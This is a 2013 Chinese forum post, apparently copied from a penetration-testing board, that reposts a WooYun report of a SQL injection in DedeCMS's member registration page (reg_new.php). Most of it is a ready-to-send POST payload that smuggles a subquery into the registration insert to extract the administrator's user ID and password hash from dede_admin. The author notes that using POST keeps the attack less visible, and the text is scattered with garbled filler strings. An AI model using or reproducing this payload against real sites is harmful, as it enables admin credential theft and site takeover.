中国网络渗透测试联盟

标题: 织梦SQL注入漏洞再利用 [打印本页]

作者: admin    时间: 2013-1-19 08:25
标题: 织梦SQL注入漏洞再利用
漏洞类型: SQL注射漏洞3 s) L, P+ }# @$ z
简要描述:
( h1 V; i/ N1 l" Q4 P# ] 0 r# P: q+ g5 i0 u- c
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.' H3 q" J. f4 m
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.7 c  Z8 c; N) }0 M4 @  W) s" d
详细说明:跟这个漏洞- V* T: s/ V. W2 o  I
, L7 b. u9 V  G% @, g& ^
WooYun: Dedecms SQL注射导致审核机制绕过漏洞- p! A. q* p8 t; B. a( D
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
( X( c$ A% f# F8 ZPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
' d  H4 X3 e* }7 x+ O/ o ) x. m5 |5 X* k% e3 {
www.political-security.com/member/reg_new.php8 M! f1 Z4 |% f6 H: W) q: {9 b% O
7 [! Z  c; o- X% A0 L: [. C
POST
' M9 N% }. K' F9 o7 |
- j5 z  a1 o% Sdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
# x. s% P+ W7 j  w- k7 quserid=c4rp3nt3r&uname=c4rp3nt3r/ ^7 V- l% \# _/ c7 M
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss7 @: V8 w5 Z2 H8 |
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
# [3 e! S! K3 J+ v6 W0 H( `(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
/ S7 E) I. F# o+ ]# c' B%00&vdcode=glos&agree=




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2